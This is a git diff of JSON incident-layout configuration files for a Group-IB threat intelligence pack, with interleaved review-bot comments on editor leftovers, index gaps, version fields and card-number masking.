+ { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": 
"workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 53, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 53, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 53, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 53, + "id": "incident-created-field", + "index": 0, + 
"sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 53, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 44, + "id": "incident-closeNotes-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-cd4f29e0-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "124ee3f0-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "18f3a290-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + 
"fieldId": "gibreliability", + "height": 22, + "id": "1f37caa0-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "2584cc50-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-cdfd6b40-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "70e86b70-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "3d09f890-8492-11ef-87c7-cfae65ac92d0", + "index": 1, + "listId": "caseinfoid-cdfd6b40-71a3-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwaretable", + "height": 106, + "id": "e6582420-7ef8-11ef-b283-25e62b0b3d26", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcompromisedeventstable", + "height": 106, + "id": "49798ba0-7cb2-11ef-90b5-fb0a4d432031", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d75c19c0-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorstable", + "height": 106, + "id": "0b7cf000-7c06-11ef-9463-3d1550681d08", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actors Table", + "static": false, + "w": 1, + "x": 1, + "y": 4 
+ }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d819eb80-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "33c6da60-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "3b060440-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstcompromised", + "height": 22, + "id": "403b2d50-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastcompromised", + "height": 22, + "id": "45e1b5d0-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d8d37780-71a3-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibcardissuer", + "height": 22, + "id": "eea826a0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcardnumber", + "height": 22, + "id": "f493f580-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcardtype", + "height": 22, + "id": "fb15e9e0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibpaymentsystem", + "height": 22, + "id": "00f69530-71a4-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Card Info From Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": 
"custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Compromised Card Group Layout", + "name": "GIB Compromised Card Group Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json index 76eedf722bbc..fa81e7009af2 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Layout.json @@ -453,7 +453,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, @@ -508,7 +508,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Person Information from GIB TIA", + "name": "Person Information from GIB", "static": false, "w": 2, "x": 0, @@ -549,6 +549,5 @@ "name": "GIB Compromised Card Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "6.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json index c5f20e58e539..d4009fb9475a 100644 
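Review bot: The `gibportallink` item in the "Information from Group-IB" section carries `"dropEffect": "move"` and `"listId": "caseinfoid-cdfd6b40-71a3-11ef-8c49-f9d8b5e80cf6"`, which look like layout-editor drag state rather than layout schema, and the items after it jump from `"index": 1` to `3` and `4`, suggesting an entry was removed without renumbering; drop the two keys and renumber `gibmalwaretable` and `gibcompromisedeventstable` to `"index": 2` and `"index": 3`. Separately, `gibcardnumber` is rendered as a plain field in "Card Info From Group-IB"; if the mapper populates it with a full card number, a masked representation would be the safer thing to show in an incident layout — confirm what the upstream field actually holds before relying on it.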
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_IMEI_Layout.json @@ -321,7 +321,7 @@ "minH": 1, "minW": 2, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json index 62bd70908c95..d7190a4a63c1 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Mule_Layout.json 
@@ -1,245 +1,516 @@ { "description": "Layout for GIB Compromised Mule", - "group": "indicator", + "group": "incident", "id": "GIB Compromised Mule Layout", - "indicatorsDetails": { + "name": "GIB Compromised Mule Layout", + "system": false, + "version": -1, + "fromVersion": "0.0.0", + "detailsV2": { "tabs": [ { - "id": "default-main", - "name": "Info", + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", "sections": [ - { - "h": 8, - "i": "default-main-comments", - "moved": false, - "name": "Comments", - "static": false, - "type": "comments", - "w": 1, - "x": 2, - "y": 3 - }, - { - "h": 2, - "hideName": true, - "i": "default-main-relatedIncidents", - "moved": false, - "name": "Related Incidents", - "static": false, - "type": "relatedIncidents", - "w": 2, - "x": 0, - "y": 6 - }, { "displayType": "ROW", "h": 2, - "i": "default-main-e2c8c970-a09d-11e9-8956-390f602b039a", + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, "items": [ { "endCol": 2, - "fieldId": "indicatortype", + "fieldId": "type", "height": 22, - "id": "indicator-type", + "id": "incident-type-field", "index": 0, "sectionItemType": "field", "startCol": 0 }, { "endCol": 2, - "fieldId": "modified", + "fieldId": "severity", "height": 22, - "id": "indicator-modified", + "id": "incident-severity-field", "index": 1, "sectionItemType": "field", "startCol": 0 }, { "endCol": 2, - "fieldId": "expiration", + "fieldId": "owner", "height": 22, - "id": "indicator-expiration", + "id": "incident-owner-field", "index": 2, "sectionItemType": "field", "startCol": 0 }, { "endCol": 2, - "fieldId": "timestamp", + "fieldId": "sourcebrand", "height": 22, - "id": "indicator-timestamp", - "index": 3, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + 
"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, "sectionItemType": "field", "startCol": 0 } ], + "maxW": 3, "moved": false, - "name": "Basic Information", + "name": "Case Details", "static": false, "w": 1, "x": 0, - "y": 1 + "y": 0 }, { - "displayType": "ROW", - "h": 3, - "i": "default-main-indicatorTimeline", + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, "moved": false, - "name": "Timeline", + "name": "Notes", "static": false, - "type": "indicatorTimeline", + "type": "notes", "w": 1, "x": 2, "y": 0 }, { - "h": 1, - "hideName": true, - "i": "default-main-reputationStatus", + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, "moved": false, - "name": "Reputation Status", + "name": "Work Plan", "static": false, - "type": "reputationStatus", + "type": "workplan", "w": 1, "x": 1, "y": 0 }, { - "h": 1, - "hideName": true, - "i": "default-main-expirationStatus", + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, "moved": false, - "name": "Expiration Status", + "name": "Linked Incidents", "static": false, - "type": "expirationStatus", + "type": "linkedIncidents", "w": 1, - "x": 0, - "y": 0 + "x": 1, + "y": 11 }, { + "displayType": "ROW", "h": 2, - "i": "default-main-reputationSources", + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, "moved": false, - "name": "Reputation", + "name": "Child Incidents", "static": false, - "type": "reputationSources", + "type": "childInv", "w": 1, - "x": 1, - "y": 1 + "x": 2, + "y": 4 }, { - "h": 3, - "i": "default-main-sources", + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + 
{ + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, "moved": false, - "name": "Sources Data", + "name": "Indicators", + "query": "", + "queryType": "input", "static": false, - "type": "sources", + "type": "indicators", "w": 2, "x": 0, - "y": 8 + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 53, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 53, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 53, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 53, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 53, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 7 }, { "displayType": "ROW", - "h": 1, - "i": "default-main-e2c8c970-a09d-11e9-8956-390f602b039b", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, "items": [ { "endCol": 2, - "fieldId": "firstseen", + "fieldId": "dbotclosed", "height": 22, - "id": "indicator-first-seen", + "id": "incident-dbotClosed-field", "index": 0, "sectionItemType": "field", "startCol": 0 }, { 
"endCol": 2, - "fieldId": "lastseen", + "fieldId": "closereason", "height": 22, - "id": "indicator-last-seen", + "id": "incident-closeReason-field", "index": 1, "sectionItemType": "field", "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 } ], + "maxW": 3, "moved": false, - "name": "Related Incidents", + "name": "Closing Information", "static": false, - "w": 2, + "w": 1, "x": 0, - "y": 5 + "y": 11 }, { - "displayType": "ROW", + "displayType": "CARD", "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 7 + }, + { + "displayType": "ROW", + "h": 3, "hideName": false, - "i": "default-main-98041610-7373-11eb-8aef-c39e29f029fe", + "i": "caseinfoid-ceb57b30-71a4-11ef-8c49-f9d8b5e80cf6", "items": [ { + "dropEffect": "move", "endCol": 4, - "fieldId": "creationdate", + "fieldId": "gibid", "height": 22, - "id": "d40f6d70-7379-11eb-8aef-c39e29f029fe", + "id": "ec29eac0-71a4-11ef-8c49-f9d8b5e80cf6", "index": 0, + "listId": "caseinfoid-ceb57b30-71a4-11ef-8c49-f9d8b5e80cf6", "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibmalwarename", + "fieldId": "gibcompromisedaccount", "height": 22, - "id": "b149e530-7375-11eb-8aef-c39e29f029fe", + "id": "91a41bb0-7bf5-11ef-96a8-77b28953dd87", "index": 1, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", "endCol": 4, - "fieldId": "gibid", + "fieldId": "gibdatahash", "height": 22, - "id": "ad5d41b0-7375-11eb-8aef-c39e29f029fe", + "id": "f23b1bf0-71a4-11ef-8c49-f9d8b5e80cf6", "index": 2, - "listId": "default-main-98041610-7373-11eb-8aef-c39e29f029fe", 
"sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "source", + "fieldId": "gibdateadd", "height": 22, - "id": "2f1064e0-737a-11eb-8aef-c39e29f029fe", + "id": "f8a17200-71a4-11ef-8c49-f9d8b5e80cf6", "index": 3, "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibcollection", + "fieldId": "gibdateincident", "height": 22, - "id": "36f4e490-737c-11eb-8aef-c39e29f029fe", + "id": "ff7e7eb0-71a4-11ef-8c49-f9d8b5e80cf6", "index": 4, "sectionItemType": "field", "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationbic", + "height": 22, + "id": "0bc55900-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationbsb", + "height": 22, + "id": "1197d380-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationiban", + "height": 22, + "id": "42bc6480-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationname", + "height": 22, + "id": "48ba5bd0-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationswift", + "height": 22, + "id": "4e2e89b0-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationclabe", + "height": 22, + "id": "53aec580-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "508b68e0-8492-11ef-87c7-cfae65ac92d0", + "index": 11, + "sectionItemType": "field", + "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, "w": 2, "x": 0, - "y": 3 + "y": 4 + }, + { + 
"displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d0dfd540-71a4-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "69511a00-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "6ee8fc80-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "74e0d950-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "7a3b8bc0-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 } ], "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" } ] - }, - "name": "GIB Compromised Mule Layout", - "system": false, - "version": -1, - "fromVersion": "6.0.0" + } } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json new file mode 100644 index 000000000000..2324efaec1fc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json 
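Review bot: The rewritten Compromised Mule layout sets `"fromVersion": "0.0.0"` at the top of the hunk, while the value it replaces was `"6.0.0"` and every other new incident layout in this patch uses `"6.10.0"`; a zero version would let this `detailsV2` incident layout be installed on servers that predate the format, so it should be `"fromVersion": "6.10.0"` to match its siblings. The hunk also changes the container from `"group": "indicator"` to `"group": "incident"` while keeping the same `id`, so existing installs that already have an indicator layout under this id will presumably receive an in-place type change on upgrade — worth a sentence in the PR description confirming that this migration was tested. Finally, the first item of the "Information from Group-IB" section still carries layout-editor residue (`"dropEffect": "move"` and a `listId`) that the other items do not; dropping those two keys keeps the file consistent.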
@@ -0,0 +1,529 @@ +{ + "description": "Layout for GIB Cybercriminal Threat Actor", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": 
true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 11 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + 